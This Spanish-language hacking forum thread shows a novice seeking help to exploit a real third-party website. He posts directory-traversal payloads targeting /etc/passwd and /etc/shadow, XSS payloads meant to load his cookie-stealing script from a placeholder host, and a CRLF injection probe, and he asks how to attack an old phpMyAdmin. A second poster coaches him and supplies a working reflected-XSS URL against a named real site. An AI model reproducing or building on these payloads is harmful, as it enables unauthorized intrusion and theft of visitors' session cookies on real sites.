0 Usuarios y 1 Visitante están viendo este tema.
« anterior próximo »
Páginas: [1] 
|
 |
|
 Autor
|
Tema: Directory traversal (Leído 1765 veces)
|
GhoST
User Nuevo
 Desconectado
Mensajes: 3
|
Hola, ya sé que soy nuevo por aquí y no sé si debería ir tan directo pero hí va: La web es vuln a action=../../../../../../../../../../proc/self/passwd�.png pero: 1.- Nada, no muestra nada de esto: action=../../../../../../../../../../proc/self/environ�.png No muestra nada cuando action=../../../../../../../../../../etc/shadow�.png&id=4504 creo q solo es vuln pal passwd asi k no me deja. ¿Hay algun otro metodo de explotar con directory taversal? Si no se puede con directory traversal, la web es vulnerable tb a: -ASP.NET Padding Oracle Vulnerability -Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability Pero estas si q verdaderamente no se ni por donde empezar... 2.- EDITO 19/10: He sacado más vuln y es vuln a xss: " onmouseover=prompt(970448) bad=" Yo ya he usado anteriormente en otra web xss usando este codigo: http://xxxxx.com/?action=best&srt=1>"><script src=" http://xxxxx/cookie.js">&dir=1 El problema es que no sé cómo implimentarlo aquí, es decir, he probado de todas formas y maneras: Vuln: action=best&dir=" onmouseover=prompt(970448) bad=" srt=0 Modificado: action=best&dir=" onmouseover=<script src=" http://xxxxx/cookie.js"> bad=" srt=0 action=best&dir=" onmouseover=alert() bad=" srt=0 action=best&dir=" onmouseover=<script>alert()</script> bad=" srt=0 ETC... Pero nada funciona, solo el prompt. 3.- Vale esto es lo referente a xss, pero esque luego tambien es vulnerable a CRLF injection: /download.php?id= SomeCustomInjectedHeader:injected_by_wvs&t=1287498936 El caso es que no me aparece nada, ¿debería? Haber si algun alma caritativa se atreve asias. |
|
|
|
|
En línea
|
|
|
|
|
snf
|
Si esto es una pregunta... Primero un premio a tu "detector de vulnerabilidades" por encontrar que el servidor Apache es vulnerable a ASP.NET padding oracle \o/. Despues, que yo sepa no existe un tal /proc/self/passwd sino un /etc/passwd y es logico que no puedas leer el archivo shadow, si realmente lo podes hacer tenemos un muy mal administrador de sistemas a la vista. Siguiendo, xss es un ataque que a pesar de que saca ventaja de un bug en la web, es clientside, necesitas atacar un browser(una persona). Tu tercer punto es idem al de arriba. Bienvenido  |
|
|
|
|
En línea
|
|
|
|
GhoST
User Nuevo
Desconectado
Mensajes: 3
|
Si esto es una pregunta... Primero un premio a tu "detector de vulnerabilidades" por encontrar que el servidor Apache es vulnerable a ASP.NET padding oracle o/. Despues, que yo sepa no existe un tal /proc/self/passwd sino un /etc/passwd y es logico que no puedas leer el archivo shadow, si realmente lo podes hacer tenemos un muy mal administrador de sistemas a la vista. Siguiendo, xss es un ataque que a pesar de que saca ventaja de un bug en la web, es clientside, necesitas atacar un browser(una persona). Tu tercer punto es idem al de arriba. Bienvenido Cierto me equivoqué al escribirlo es etc/shadow. Lo del xss lo sabía que es atacar a un browser, el problema es que no ejecuta el script que ponga bien, es decir: " onmouseover=prompt(970448) bad=" Eso si funciona, pero esto otro no " onmouseover=<script>alert()</script> bad=" Por tanto si eso no funciona esto otro tampoco: <script src="xxxx/cookie.js"> (q es mi archivo de robar cookies). De todos modos si esto no funcionara, la web tiene en la raiz www.xxx.com/sql el phpmyadmin, pero resulta que es de la versión 2.0.55 o inferior. Cómo podria explotarla? GRACIAS. |
|
|
|
|
En línea
|
|
|
|
|
snf
|
Claramente no te vamos a dar nada servido en bandeja ;-) . Estas entendiendo mal el xss, vos podes inyectar codigo en un tag html, esto sucede porque no esta filtrando las comillas, por ejemplo aca: <input text="TUCODIGO">... ahi podes agregar cualquier cosa y cerrar las comillas como bien hizo tu detector con onmouseover. Si entendes html y javascript, vas a poder armar un html valido inyectando tu codigo ahi. Aca tenes una referencia de distintas tecnicas que podes usar para bypassear distintos filtros http://ha.ckers.org/xss.html . Tu segunda pregunta no vale la pena contestarla :-). |
|
|
|
|
En línea
|
|
|
|
GhoST
User Nuevo
Desconectado
Mensajes: 3
|
Claramente no te vamos a dar nada servido en bandeja ;-) . Estas entendiendo mal el xss, vos podes inyectar codigo en un tag html, esto sucede porque no esta filtrando las comillas, por ejemplo aca: <input text="TUCODIGO">... ahi podes agregar cualquier cosa y cerrar las comillas como bien hizo tu detector con onmouseover. Si entendes html y javascript, vas a poder armar un html valido inyectando tu codigo ahi. Aca tenes una referencia de distintas tecnicas que podes usar para bypassear distintos filtros http://ha.ckers.org/xss.html . Tu segunda pregunta no vale la pena contestarla :-). Para empezar, gracias por las molestias que te estás tomando. Continuado con el problema, he intentado pasar muchos de los filtros de el link que me pasaste y nada. Creo que he entendido correctamente lo que me dijiste pero creo que hay varios filtros a los que saltarse: " onmouseover=<script>alert()</script> bad=" Cuando pongo cualquier código que contenga < no funciona, por tanto debería de cambiarlo por: " onmouseover=<script>alert()</script> bad=" Pero tampoco funciona. Sin embargo, cuando escribo " onmouseover=alert() bad=" entonces sí que funciona. Podrías explicarme por qué? gracias |
|
|
|
|
En línea
|
|
|
|
|
snf
|
Es sencillo, te falta entender html todavia.
En los tags se pueden agregar eventos, onmouseover es un evento y ejecuta el codigo en javascript que le asignes. Tu problema es que estas abriendo tags dentro del mismo codigo javascript.
Esto no es un codigo valido:
" onmouseover=<script>alert()</script> bad=" ,
En cambio esto si:
" onmouseover="alert()" bad="
es por el motivo que te dije antes, entre esas comillas no tenes que abrir otra aunque podrias cerrar las comillas, cerrar el tag y abrir un tag script insertando codigo adentro, aunque hay muchas posibilidades que esten filtrados los signos <> .
Para la proximas ves que pruebes intenta averiguar mas el tema y analizar todo en si, para poder atacar un programa tenes que conocerla igual que el que la hizo y tenes mas conocimientos sobre el tema en general.
|
|
|
|
|
En línea
|
|
|
|
|
snf
|
Bueno, como la idea es que todos aprendamos, voy a poner como se soluciono el problema por privado ya que veo que despues de tener la solucion no le importo postearla a pesar de que se lo pedi para que otros puedan sacarle provecho. ---GhoST Haber he estado leyéndome y comprendiendo todo lo que me dijiste, pero prueba tú mismo no funciona como tú dijiste: http://roc.replayers.com/index.php?action=search&task=search&uid=" onmouseover=alert() bad=" Así sí pero con las comillas que tú pusiste no http://roc.replayers.com/index.php?action=search&task=search&uid=" onmouseover="alert()" bad=" Lo que yo quiero es algo así: http://roc.replayers.com/index.php?action=search&task=search&uid=" onmouseover=<script src=' http://xxx/cookie.js'</script> bad=" Pero claro tiene filtrado de <>, tonces los cambio por < > y sigue sin funcionar, haber si puedes sacar tú mismo el problema y me enseñaras mi defecto. Gracias ------- ----snf Comprobando mis sospechas eso no tiene nada de filtrado, y no entendiste lo que te dije, no queria dartelo servido para que aprendas pero para que te des cuenta es asi: http://roc.replayers.com/index.php?action=search&task=search&uid="><script>alert("xss")</script></ br t=" Ahi podes ver que le cierro las comillas, cierro el tag con > y abro uno nuevo de script, escribo el xss, cierro el tag de script y abro un tag cualquiera para poder abrir las comillas y que la pagina no se deforme cuando el html original cierre las comillas y el tag que estaba abierto. Para poder realizar estos ataques tenes que tener mas claro todo sobre html, no se trata de intentar romper ciegamente. Se trata de analizar el source cada vez que inyectas el comando y ir armando todo con distintas tecnicas,, por eso puse esa web que tiene muchas formas de armar xss sin usar comillas ni simbolos <> . Igualmente no estan filtrados. Lo que puede ser es que el browser que estas usando vos lo esta filtrando, pero si revisas el source el xss esta ahi. Y la proxima vez pregunta por el foro, no respondo por privado generalmente. ----- |
|
|
|
|
En línea
|
|
|
|
tuxero
Principiantes
Desconectado
Mensajes: 77
|
Pense que explotabas  pero te armaste de paciencia, auque ahora me debes una cuenta hiper,super, recontra full para un server del lineage jejejeje.Muy buena la explicación. Saludos. |
|
|
|
|
En línea
|
|
|
|
D4n1Sk
User Nuevo
Desconectado
Mensajes: 2
|
Para poder realizar estos ataques tenes que tener mas claro todo sobre html, no se trata de intentar romper ciegamente.
Se trata de analizar el source cada vez que inyectas el comando y ir armando todo con distintas tecnicas,, por eso puse esa web que tiene muchas formas de armar xss sin usar comillas ni simbolos <> . Igualmente no estan filtrados.
Lo que puede ser es que el browser que estas usando vos lo esta filtrando, pero si revisas el source el xss esta ahi.
Y la proxima vez pregunta por el foro, no respondo por privado generalmente.
-----
Hola perdonen por entrometerme pero como analizo el source o como llego a el? |
|
|
|
|
En línea
|
|
|
|
|
snf
|
Le llamo source al html. Todos los browsers tienen en algun lado el "view source".
Y la forma de analizarlo es buscando si nuestro texto aparece y como, que caracteres se filtraron, etc, etc.
|
|
|
|
|
En línea
|
|
|
|
D4n1Sk
User Nuevo
Desconectado
Mensajes: 2
|
Vendría a ser el index.php? o le estoy errando fiero
|
|
|
|
|
En línea
|
|
|
|
|
taul
|
Le llamo source al html. Todos los browsers tienen en algun lado el "view source".
Y la forma de analizarlo es buscando si nuestro texto aparece y como, que caracteres se filtraron, etc, etc.
snf dGUlMjB0b21hc3RlJTIwdW4lMjBhcGxheCUyMGFudGVzJTIwZGUlMjByZXNwb25kZXIlMjBlc3RlJTIwcG9zdCUzRiUyMGphamFqYSUyMHF1ZSUyMGN1bGlhby4uc2UlMjB0ZSUyMG5vdG8lMjB1biUyMHBvY28lMjBhbHRlcmFkbyUyMGphamFqYWphamFqYSUyMHklMjBubyUyMGhhZ2FzJTIwZG9ibGUlMjBwb3N0JTIwY3VsaWFvb28= Pense que explotabas pero te armaste de paciencia, auque ahora me debes una cuenta hiper,super, recontra full para un server del lineage jejejeje.Muy buena la explicación. Saludos. ehhhh **** yo tambien juego al l2...que sean 2 cuentas por favor.!!! |
|
|
|
« Última modificación: Diciembre 02, 2010, 03:07:52 por taul »
|
En línea
|
C Nuestro, q estas en la Memoria,Compilado sea tu código,venga a nosotros tu software,carguense tus punteros.así en la RAM como en el Disco Duro,Danos hoy nuestro Array de cada día,Perdona nuestros Warnings,así como nosotros también los eliminamos,
no nos dejes caer en Bucles,y libranos del Windows
|
|
|
|
snf
|
No, me refiero al html ya procesado... <html> <body> <a>bbbbb</a> ..... </html> Si se refleja algo que hayas puesto vos en algun input o variable en la pagina web(html), entonces puede haber alguna forma de deformarla a tu favor. |
|
|
|
|
En línea
|
|
|
|
|
 |
